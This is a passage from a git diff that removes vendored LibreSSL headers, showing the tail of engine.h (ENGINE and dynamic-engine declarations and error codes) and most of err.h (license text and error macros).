-    const char *str, int len);
-const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe,
-    const char *str, int len);
-const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e);
-int ENGINE_get_flags(const ENGINE *e);
-
-/* FUNCTIONAL functions. These functions deal with ENGINE structures
- * that have (or will) be initialised for use. Broadly speaking, the
- * structural functions are useful for iterating the list of available
- * engine types, creating new engine types, and other "list" operations.
- * These functions actually deal with ENGINEs that are to be used. As
- * such these functions can fail (if applicable) when particular
- * engines are unavailable - eg. if a hardware accelerator is not
- * attached or not functioning correctly. Each ENGINE has 2 reference
- * counts; structural and functional. Every time a functional reference
- * is obtained or released, a corresponding structural reference is
- * automatically obtained or released too. */
-
-/* Initialise a engine type for use (or up its reference count if it's
- * already in use). This will fail if the engine is not currently
- * operational and cannot initialise. */
-int ENGINE_init(ENGINE *e);
-/* Free a functional reference to a engine type. This does not require
- * a corresponding call to ENGINE_free as it also releases a structural
- * reference. */
-int ENGINE_finish(ENGINE *e);
-
-/* The following functions handle keys that are stored in some secondary
- * location, handled by the engine.  The storage may be on a card or
- * whatever. */
-EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id,
-    UI_METHOD *ui_method, void *callback_data);
-EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id,
-    UI_METHOD *ui_method, void *callback_data);
-int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s,
-    STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **ppkey,
-    STACK_OF(X509) **pother,
-    UI_METHOD *ui_method, void *callback_data);
-
-/* This returns a pointer for the current ENGINE structure that
- * is (by default) performing any RSA operations. The value returned
- * is an incremented reference, so it should be free'd (ENGINE_finish)
- * before it is discarded. */
-ENGINE *ENGINE_get_default_RSA(void);
-/* Same for the other "methods" */
-ENGINE *ENGINE_get_default_DSA(void);
-ENGINE *ENGINE_get_default_ECDH(void);
-ENGINE *ENGINE_get_default_ECDSA(void);
-ENGINE *ENGINE_get_default_DH(void);
-ENGINE *ENGINE_get_default_RAND(void);
-/* These functions can be used to get a functional reference to perform
- * ciphering or digesting corresponding to "nid". */
-ENGINE *ENGINE_get_cipher_engine(int nid);
-ENGINE *ENGINE_get_digest_engine(int nid);
-ENGINE *ENGINE_get_pkey_meth_engine(int nid);
-ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid);
-
-/* This sets a new default ENGINE structure for performing RSA
- * operations. If the result is non-zero (success) then the ENGINE
- * structure will have had its reference count up'd so the caller
- * should still free their own reference 'e'. */
-int ENGINE_set_default_RSA(ENGINE *e);
-int ENGINE_set_default_string(ENGINE *e, const char *def_list);
-/* Same for the other "methods" */
-int ENGINE_set_default_DSA(ENGINE *e);
-int ENGINE_set_default_ECDH(ENGINE *e);
-int ENGINE_set_default_ECDSA(ENGINE *e);
-int ENGINE_set_default_DH(ENGINE *e);
-int ENGINE_set_default_RAND(ENGINE *e);
-int ENGINE_set_default_ciphers(ENGINE *e);
-int ENGINE_set_default_digests(ENGINE *e);
-int ENGINE_set_default_pkey_meths(ENGINE *e);
-int ENGINE_set_default_pkey_asn1_meths(ENGINE *e);
-
-/* The combination "set" - the flags are bitwise "OR"d from the
- * ENGINE_METHOD_*** defines above. As with the "ENGINE_register_complete()"
- * function, this function can result in unnecessary static linkage. If your
- * application requires only specific functionality, consider using more
- * selective functions. */
-int ENGINE_set_default(ENGINE *e, unsigned int flags);
-
-void ENGINE_add_conf_module(void);
-
-/* Deprecated functions ... */
-/* int ENGINE_clear_defaults(void); */
-
-/**************************/
-/* DYNAMIC ENGINE SUPPORT */
-/**************************/
-
-/* Binary/behaviour compatibility levels */
-#define OSSL_DYNAMIC_VERSION		(unsigned long)0x00020000
-/* Binary versions older than this are too old for us (whether we're a loader or
- * a loadee) */
-#define OSSL_DYNAMIC_OLDEST		(unsigned long)0x00020000
-
-/* When compiling an ENGINE entirely as an external shared library, loadable by
- * the "dynamic" ENGINE, these types are needed. The 'dynamic_fns' structure
- * type provides the calling application's (or library's) error functionality
- * and memory management function pointers to the loaded library. These should
- * be used/set in the loaded library code so that the loading application's
- * 'state' will be used/changed in all operations. The 'static_state' pointer
- * allows the loaded library to know if it shares the same static data as the
- * calling application (or library), and thus whether these callbacks need to be
- * set or not. */
-typedef void *(*dyn_MEM_malloc_cb)(size_t);
-typedef void *(*dyn_MEM_realloc_cb)(void *, size_t);
-typedef void (*dyn_MEM_free_cb)(void *);
-typedef struct st_dynamic_MEM_fns {
-	dyn_MEM_malloc_cb			malloc_cb;
-	dyn_MEM_realloc_cb			realloc_cb;
-	dyn_MEM_free_cb				free_cb;
-} dynamic_MEM_fns;
-/* FIXME: Perhaps the memory and locking code (crypto.h) should declare and use
- * these types so we (and any other dependant code) can simplify a bit?? */
-typedef void (*dyn_lock_locking_cb)(int, int, const char *, int);
-typedef int (*dyn_lock_add_lock_cb)(int*, int, int, const char *, int);
-typedef struct CRYPTO_dynlock_value *(*dyn_dynlock_create_cb)(
-    const char *, int);
-typedef void (*dyn_dynlock_lock_cb)(int, struct CRYPTO_dynlock_value *,
-    const char *, int);
-typedef void (*dyn_dynlock_destroy_cb)(struct CRYPTO_dynlock_value *,
-    const char *, int);
-typedef struct st_dynamic_LOCK_fns {
-	dyn_lock_locking_cb			lock_locking_cb;
-	dyn_lock_add_lock_cb			lock_add_lock_cb;
-	dyn_dynlock_create_cb			dynlock_create_cb;
-	dyn_dynlock_lock_cb			dynlock_lock_cb;
-	dyn_dynlock_destroy_cb			dynlock_destroy_cb;
-} dynamic_LOCK_fns;
-/* The top-level structure */
-typedef struct st_dynamic_fns {
-	void 					*static_state;
-	const ERR_FNS				*err_fns;
-	const CRYPTO_EX_DATA_IMPL		*ex_data_fns;
-	dynamic_MEM_fns				mem_fns;
-	dynamic_LOCK_fns			lock_fns;
-} dynamic_fns;
-
-/* The version checking function should be of this prototype. NB: The
- * ossl_version value passed in is the OSSL_DYNAMIC_VERSION of the loading code.
- * If this function returns zero, it indicates a (potential) version
- * incompatibility and the loaded library doesn't believe it can proceed.
- * Otherwise, the returned value is the (latest) version supported by the
- * loading library. The loader may still decide that the loaded code's version
- * is unsatisfactory and could veto the load. The function is expected to
- * be implemented with the symbol name "v_check", and a default implementation
- * can be fully instantiated with IMPLEMENT_DYNAMIC_CHECK_FN(). */
-typedef unsigned long (*dynamic_v_check_fn)(unsigned long ossl_version);
-#define IMPLEMENT_DYNAMIC_CHECK_FN() \
-	extern unsigned long v_check(unsigned long v); \
-	extern unsigned long v_check(unsigned long v) { \
-		if(v >= OSSL_DYNAMIC_OLDEST) return OSSL_DYNAMIC_VERSION; \
-		return 0; }
-
-/* This function is passed the ENGINE structure to initialise with its own
- * function and command settings. It should not adjust the structural or
- * functional reference counts. If this function returns zero, (a) the load will
- * be aborted, (b) the previous ENGINE state will be memcpy'd back onto the
- * structure, and (c) the shared library will be unloaded. So implementations
- * should do their own internal cleanup in failure circumstances otherwise they
- * could leak. The 'id' parameter, if non-NULL, represents the ENGINE id that
- * the loader is looking for. If this is NULL, the shared library can choose to
- * return failure or to initialise a 'default' ENGINE. If non-NULL, the shared
- * library must initialise only an ENGINE matching the passed 'id'. The function
- * is expected to be implemented with the symbol name "bind_engine". A standard
- * implementation can be instantiated with IMPLEMENT_DYNAMIC_BIND_FN(fn) where
- * the parameter 'fn' is a callback function that populates the ENGINE structure
- * and returns an int value (zero for failure). 'fn' should have prototype;
- *    [static] int fn(ENGINE *e, const char *id); */
-typedef int (*dynamic_bind_engine)(ENGINE *e, const char *id,
-    const dynamic_fns *fns);
-#define IMPLEMENT_DYNAMIC_BIND_FN(fn) \
-	extern \
-	int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns); \
-	extern \
-	int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns) { \
-		if(ENGINE_get_static_state() == fns->static_state) goto skip_cbs; \
-		if(!CRYPTO_set_mem_functions(fns->mem_fns.malloc_cb, \
-			fns->mem_fns.realloc_cb, fns->mem_fns.free_cb)) \
-			return 0; \
-		CRYPTO_set_locking_callback(fns->lock_fns.lock_locking_cb); \
-		CRYPTO_set_add_lock_callback(fns->lock_fns.lock_add_lock_cb); \
-		CRYPTO_set_dynlock_create_callback(fns->lock_fns.dynlock_create_cb); \
-		CRYPTO_set_dynlock_lock_callback(fns->lock_fns.dynlock_lock_cb); \
-		CRYPTO_set_dynlock_destroy_callback(fns->lock_fns.dynlock_destroy_cb); \
-		if(!CRYPTO_set_ex_data_implementation(fns->ex_data_fns)) \
-			return 0; \
-		if(!ERR_set_implementation(fns->err_fns)) return 0; \
-	skip_cbs: \
-		if(!fn(e,id)) return 0; \
-		return 1; }
-
-/* If the loading application (or library) and the loaded ENGINE library share
- * the same static data (eg. they're both dynamically linked to the same
- * libcrypto.so) we need a way to avoid trying to set system callbacks - this
- * would fail, and for the same reason that it's unnecessary to try. If the
- * loaded ENGINE has (or gets from through the loader) its own copy of the
- * libcrypto static data, we will need to set the callbacks. The easiest way to
- * detect this is to have a function that returns a pointer to some static data
- * and let the loading application and loaded ENGINE compare their respective
- * values. */
-					void *ENGINE_get_static_state(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ENGINE_strings(void);
-
-/* Error codes for the ENGINE functions. */
-
-/* Function codes. */
-#define ENGINE_F_DYNAMIC_CTRL				 180
-#define ENGINE_F_DYNAMIC_GET_DATA_CTX			 181
-#define ENGINE_F_DYNAMIC_LOAD				 182
-#define ENGINE_F_DYNAMIC_SET_DATA_CTX			 183
-#define ENGINE_F_ENGINE_ADD				 105
-#define ENGINE_F_ENGINE_BY_ID				 106
-#define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE		 170
-#define ENGINE_F_ENGINE_CTRL				 142
-#define ENGINE_F_ENGINE_CTRL_CMD			 178
-#define ENGINE_F_ENGINE_CTRL_CMD_STRING			 171
-#define ENGINE_F_ENGINE_FINISH				 107
-#define ENGINE_F_ENGINE_FREE_UTIL			 108
-#define ENGINE_F_ENGINE_GET_CIPHER			 185
-#define ENGINE_F_ENGINE_GET_DEFAULT_TYPE		 177
-#define ENGINE_F_ENGINE_GET_DIGEST			 186
-#define ENGINE_F_ENGINE_GET_NEXT			 115
-#define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH		 193
-#define ENGINE_F_ENGINE_GET_PKEY_METH			 192
-#define ENGINE_F_ENGINE_GET_PREV			 116
-#define ENGINE_F_ENGINE_INIT				 119
-#define ENGINE_F_ENGINE_LIST_ADD			 120
-#define ENGINE_F_ENGINE_LIST_REMOVE			 121
-#define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY		 150
-#define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY			 151
-#define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT		 194
-#define ENGINE_F_ENGINE_NEW				 122
-#define ENGINE_F_ENGINE_REMOVE				 123
-#define ENGINE_F_ENGINE_SET_DEFAULT_STRING		 189
-#define ENGINE_F_ENGINE_SET_DEFAULT_TYPE		 126
-#define ENGINE_F_ENGINE_SET_ID				 129
-#define ENGINE_F_ENGINE_SET_NAME			 130
-#define ENGINE_F_ENGINE_TABLE_REGISTER			 184
-#define ENGINE_F_ENGINE_UNLOAD_KEY			 152
-#define ENGINE_F_ENGINE_UNLOCKED_FINISH			 191
-#define ENGINE_F_ENGINE_UP_REF				 190
-#define ENGINE_F_INT_CTRL_HELPER			 172
-#define ENGINE_F_INT_ENGINE_CONFIGURE			 188
-#define ENGINE_F_INT_ENGINE_MODULE_INIT			 187
-#define ENGINE_F_LOG_MESSAGE				 141
-
-/* Reason codes. */
-#define ENGINE_R_ALREADY_LOADED				 100
-#define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER		 133
-#define ENGINE_R_CMD_NOT_EXECUTABLE			 134
-#define ENGINE_R_COMMAND_TAKES_INPUT			 135
-#define ENGINE_R_COMMAND_TAKES_NO_INPUT			 136
-#define ENGINE_R_CONFLICTING_ENGINE_ID			 103
-#define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED		 119
-#define ENGINE_R_DH_NOT_IMPLEMENTED			 139
-#define ENGINE_R_DSA_NOT_IMPLEMENTED			 140
-#define ENGINE_R_DSO_FAILURE				 104
-#define ENGINE_R_DSO_NOT_FOUND				 132
-#define ENGINE_R_ENGINES_SECTION_ERROR			 148
-#define ENGINE_R_ENGINE_CONFIGURATION_ERROR		 102
-#define ENGINE_R_ENGINE_IS_NOT_IN_LIST			 105
-#define ENGINE_R_ENGINE_SECTION_ERROR			 149
-#define ENGINE_R_FAILED_LOADING_PRIVATE_KEY		 128
-#define ENGINE_R_FAILED_LOADING_PUBLIC_KEY		 129
-#define ENGINE_R_FINISH_FAILED				 106
-#define ENGINE_R_GET_HANDLE_FAILED			 107
-#define ENGINE_R_ID_OR_NAME_MISSING			 108
-#define ENGINE_R_INIT_FAILED				 109
-#define ENGINE_R_INTERNAL_LIST_ERROR			 110
-#define ENGINE_R_INVALID_ARGUMENT			 143
-#define ENGINE_R_INVALID_CMD_NAME			 137
-#define ENGINE_R_INVALID_CMD_NUMBER			 138
-#define ENGINE_R_INVALID_INIT_VALUE			 151
-#define ENGINE_R_INVALID_STRING				 150
-#define ENGINE_R_NOT_INITIALISED			 117
-#define ENGINE_R_NOT_LOADED				 112
-#define ENGINE_R_NO_CONTROL_FUNCTION			 120
-#define ENGINE_R_NO_INDEX				 144
-#define ENGINE_R_NO_LOAD_FUNCTION			 125
-#define ENGINE_R_NO_REFERENCE				 130
-#define ENGINE_R_NO_SUCH_ENGINE				 116
-#define ENGINE_R_NO_UNLOAD_FUNCTION			 126
-#define ENGINE_R_PROVIDE_PARAMETERS			 113
-#define ENGINE_R_RSA_NOT_IMPLEMENTED			 141
-#define ENGINE_R_UNIMPLEMENTED_CIPHER			 146
-#define ENGINE_R_UNIMPLEMENTED_DIGEST			 147
-#define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD	 101
-#define ENGINE_R_VERSION_INCOMPATIBILITY		 145
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/err.h b/thirdparty/libressl/include/openssl/err.h
deleted file mode 100644
index 22cdb29..0000000
--- a/thirdparty/libressl/include/openssl/err.h
+++ /dev/null
@@ -1,421 +0,0 @@
-/* $OpenBSD: err.h,v 1.25 2017/02/20 23:21:19 beck Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_ERR_H
-#define HEADER_ERR_H
-
-#include <openssl/opensslconf.h>
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#ifndef OPENSSL_NO_LHASH
-#include <openssl/lhash.h>
-#endif
-
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#ifndef OPENSSL_NO_ERR
-#define ERR_PUT_error(a,b,c,d,e)	ERR_put_error(a,b,c,d,e)
-#else
-#define ERR_PUT_error(a,b,c,d,e)	ERR_put_error(a,b,c,NULL,0)
-#endif
-
-#include <errno.h>
-
-#define ERR_TXT_MALLOCED	0x01
-#define ERR_TXT_STRING		0x02
-
-#define ERR_FLAG_MARK		0x01
-
-#define ERR_NUM_ERRORS	16
-typedef struct err_state_st {
-	CRYPTO_THREADID tid;
-	int err_flags[ERR_NUM_ERRORS];
-	unsigned long err_buffer[ERR_NUM_ERRORS];
-	char *err_data[ERR_NUM_ERRORS];
-	int err_data_flags[ERR_NUM_ERRORS];
-	const char *err_file[ERR_NUM_ERRORS];
-	int err_line[ERR_NUM_ERRORS];
-	int top, bottom;
-} ERR_STATE;
-
-/* library */
-#define ERR_LIB_NONE		1
-#define ERR_LIB_SYS		2
-#define ERR_LIB_BN		3
-#define ERR_LIB_RSA		4
-#define ERR_LIB_DH		5
-#define ERR_LIB_EVP		6
-#define ERR_LIB_BUF		7
-#define ERR_LIB_OBJ		8
-#define ERR_LIB_PEM		9
-#define ERR_LIB_DSA		10
-#define ERR_LIB_X509		11
-/* #define ERR_LIB_METH         12 */
-#define ERR_LIB_ASN1		13
-#define ERR_LIB_CONF		14
-#define ERR_LIB_CRYPTO		15
-#define ERR_LIB_EC		16
-#define ERR_LIB_SSL		20
-/* #define ERR_LIB_SSL23        21 */
-/* #define ERR_LIB_SSL2         22 */
-/* #define ERR_LIB_SSL3         23 */
-/* #define ERR_LIB_RSAREF       30 */
-/* #define ERR_LIB_PROXY        31 */
-#define ERR_LIB_BIO		32
-#define ERR_LIB_PKCS7		33
-#define ERR_LIB_X509V3		34
-#define ERR_LIB_PKCS12		35
-#define ERR_LIB_RAND		36
-#define ERR_LIB_DSO		37
-#define ERR_LIB_ENGINE		38
-#define ERR_LIB_OCSP            39
-#define ERR_LIB_UI              40
-#define ERR_LIB_COMP            41
-#define ERR_LIB_ECDSA		42
-#define ERR_LIB_ECDH		43
-#define ERR_LIB_STORE           44
-#define ERR_LIB_FIPS		45
-#define ERR_LIB_CMS		46
-#define ERR_LIB_TS		47
-#define ERR_LIB_HMAC		48
-#define ERR_LIB_JPAKE		49
-#define ERR_LIB_GOST		50
-
-#define ERR_LIB_USER		128
-
-#ifndef LIBRESSL_INTERNAL
-#define SYSerr(f,r)  ERR_PUT_error(ERR_LIB_SYS,(f),(r),__FILE__,__LINE__)
-#define BNerr(f,r)   ERR_PUT_error(ERR_LIB_BN,(f),(r),__FILE__,__LINE__)
-#define RSAerr(f,r)  ERR_PUT_error(ERR_LIB_RSA,(f),(r),__FILE__,__LINE__)
-#define DHerr(f,r)   ERR_PUT_error(ERR_LIB_DH,(f),(r),__FILE__,__LINE__)
-#define EVPerr(f,r)  ERR_PUT_error(ERR_LIB_EVP,(f),(r),__FILE__,__LINE__)
-#define BUFerr(f,r)  ERR_PUT_error(ERR_LIB_BUF,(f),(r),__FILE__,__LINE__)
-#define OBJerr(f,r)  ERR_PUT_error(ERR_LIB_OBJ,(f),(r),__FILE__,__LINE__)
-#define PEMerr(f,r)  ERR_PUT_error(ERR_LIB_PEM,(f),(r),__FILE__,__LINE__)
-#define DSAerr(f,r)  ERR_PUT_error(ERR_LIB_DSA,(f),(r),__FILE__,__LINE__)
-#define X509err(f,r) ERR_PUT_error(ERR_LIB_X509,(f),(r),__FILE__,__LINE__)
-#define ASN1err(f,r) ERR_PUT_error(ERR_LIB_ASN1,(f),(r),__FILE__,__LINE__)
-#define CONFerr(f,r) ERR_PUT_error(ERR_LIB_CONF,(f),(r),__FILE__,__LINE__)
-#define CRYPTOerr(f,r) ERR_PUT_error(ERR_LIB_CRYPTO,(f),(r),__FILE__,__LINE__)
-#define ECerr(f,r)   ERR_PUT_error(ERR_LIB_EC,(f),(r),__FILE__,__LINE__)
-#define BIOerr(f,r)  ERR_PUT_error(ERR_LIB_BIO,(f),(r),__FILE__,__LINE__)
-#define PKCS7err(f,r) ERR_PUT_error(ERR_LIB_PKCS7,(f),(r),__FILE__,__LINE__)
-#define X509V3err(f,r) ERR_PUT_error(ERR_LIB_X509V3,(f),(r),__FILE__,__LINE__)
-#define PKCS12err(f,r) ERR_PUT_error(ERR_LIB_PKCS12,(f),(r),__FILE__,__LINE__)
-#define RANDerr(f,r) ERR_PUT_error(ERR_LIB_RAND,(f),(r),__FILE__,__LINE__)
-#define DSOerr(f,r) ERR_PUT_error(ERR_LIB_DSO,(f),(r),__FILE__,__LINE__)
-#define ENGINEerr(f,r) ERR_PUT_error(ERR_LIB_ENGINE,(f),(r),__FILE__,__LINE__)
-#define OCSPerr(f,r) ERR_PUT_error(ERR_LIB_OCSP,(f),(r),__FILE__,__LINE__)
-#define UIerr(f,r) ERR_PUT_error(ERR_LIB_UI,(f),(r),__FILE__,__LINE__)
-#define COMPerr(f,r) ERR_PUT_error(ERR_LIB_COMP,(f),(r),__FILE__,__LINE__)
-#define ECDSAerr(f,r)  ERR_PUT_error(ERR_LIB_ECDSA,(f),(r),__FILE__,__LINE__)
-#define ECDHerr(f,r)  ERR_PUT_error(ERR_LIB_ECDH,(f),(r),__FILE__,__LINE__)
-#define STOREerr(f,r) ERR_PUT_error(ERR_LIB_STORE,(f),(r),__FILE__,__LINE__)
-#define FIPSerr(f,r) ERR_PUT_error(ERR_LIB_FIPS,(f),(r),__FILE__,__LINE__)
-#define CMSerr(f,r) ERR_PUT_error(ERR_LIB_CMS,(f),(r),__FILE__,__LINE__)
-#define TSerr(f,r) ERR_PUT_error(ERR_LIB_TS,(f),(r),__FILE__,__LINE__)
-#define HMACerr(f,r) ERR_PUT_error(ERR_LIB_HMAC,(f),(r),__FILE__,__LINE__)
-#define JPAKEerr(f,r) ERR_PUT_error(ERR_LIB_JPAKE,(f),(r),__FILE__,__LINE__)
-#define GOSTerr(f,r) ERR_PUT_error(ERR_LIB_GOST,(f),(r),__FILE__,__LINE__)
-#define SSLerr(f,r)  ERR_PUT_error(ERR_LIB_SSL,(f),(r),__FILE__,__LINE__)
-#endif
-
-#ifdef LIBRESSL_INTERNAL
-#define SYSerror(r)  ERR_PUT_error(ERR_LIB_SYS,(0xfff),(r),__FILE__,__LINE__)
-#define BNerror(r)   ERR_PUT_error(ERR_LIB_BN,(0xfff),(r),__FILE__,__LINE__)
-#define RSAerror(r)  ERR_PUT_error(ERR_LIB_RSA,(0xfff),(r),__FILE__,__LINE__)
-#define DHerror(r)   ERR_PUT_error(ERR_LIB_DH,(0xfff),(r),__FILE__,__LINE__)
-#define EVPerror(r)  ERR_PUT_error(ERR_LIB_EVP,(0xfff),(r),__FILE__,__LINE__)
-#define BUFerror(r)  ERR_PUT_error(ERR_LIB_BUF,(0xfff),(r),__FILE__,__LINE__)
-#define OBJerror(r)  ERR_PUT_error(ERR_LIB_OBJ,(0xfff),(r),__FILE__,__LINE__)
-#define PEMerror(r)  ERR_PUT_error(ERR_LIB_PEM,(0xfff),(r),__FILE__,__LINE__)
-#define DSAerror(r)  ERR_PUT_error(ERR_LIB_DSA,(0xfff),(r),__FILE__,__LINE__)
-#define X509error(r) ERR_PUT_error(ERR_LIB_X509,(0xfff),(r),__FILE__,__LINE__)
-#define ASN1error(r) ERR_PUT_error(ERR_LIB_ASN1,(0xfff),(r),__FILE__,__LINE__)
-#define CONFerror(r) ERR_PUT_error(ERR_LIB_CONF,(0xfff),(r),__FILE__,__LINE__)
-#define CRYPTOerror(r) ERR_PUT_error(ERR_LIB_CRYPTO,(0xfff),(r),__FILE__,__LINE__)
-#define ECerror(r)   ERR_PUT_error(ERR_LIB_EC,(0xfff),(r),__FILE__,__LINE__)
-#define BIOerror(r)  ERR_PUT_error(ERR_LIB_BIO,(0xfff),(r),__FILE__,__LINE__)
-#define PKCS7error(r) ERR_PUT_error(ERR_LIB_PKCS7,(0xfff),(r),__FILE__,__LINE__)
-#define X509V3error(r) ERR_PUT_error(ERR_LIB_X509V3,(0xfff),(r),__FILE__,__LINE__)
-#define PKCS12error(r) ERR_PUT_error(ERR_LIB_PKCS12,(0xfff),(r),__FILE__,__LINE__)
-#define RANDerror(r) ERR_PUT_error(ERR_LIB_RAND,(0xfff),(r),__FILE__,__LINE__)
-#define DSOerror(r) ERR_PUT_error(ERR_LIB_DSO,(0xfff),(r),__FILE__,__LINE__)
-#define ENGINEerror(r) ERR_PUT_error(ERR_LIB_ENGINE,(0xfff),(r),__FILE__,__LINE__)
-#define OCSPerror(r) ERR_PUT_error(ERR_LIB_OCSP,(0xfff),(r),__FILE__,__LINE__)
-#define UIerror(r) ERR_PUT_error(ERR_LIB_UI,(0xfff),(r),__FILE__,__LINE__)
-#define COMPerror(r) ERR_PUT_error(ERR_LIB_COMP,(0xfff),(r),__FILE__,__LINE__)
-#define ECDSAerror(r)  ERR_PUT_error(ERR_LIB_ECDSA,(0xfff),(r),__FILE__,__LINE__)
-#define ECDHerror(r)  ERR_PUT_error(ERR_LIB_ECDH,(0xfff),(r),__FILE__,__LINE__)
-#define STOREerror(r) ERR_PUT_error(ERR_LIB_STORE,(0xfff),(r),__FILE__,__LINE__)
-#define FIPSerror(r) ERR_PUT_error(ERR_LIB_FIPS,(0xfff),(r),__FILE__,__LINE__)
-#define CMSerror(r) ERR_PUT_error(ERR_LIB_CMS,(0xfff),(r),__FILE__,__LINE__)
-#define TSerror(r) ERR_PUT_error(ERR_LIB_TS,(0xfff),(r),__FILE__,__LINE__)
-#define HMACerror(r) ERR_PUT_error(ERR_LIB_HMAC,(0xfff),(r),__FILE__,__LINE__)
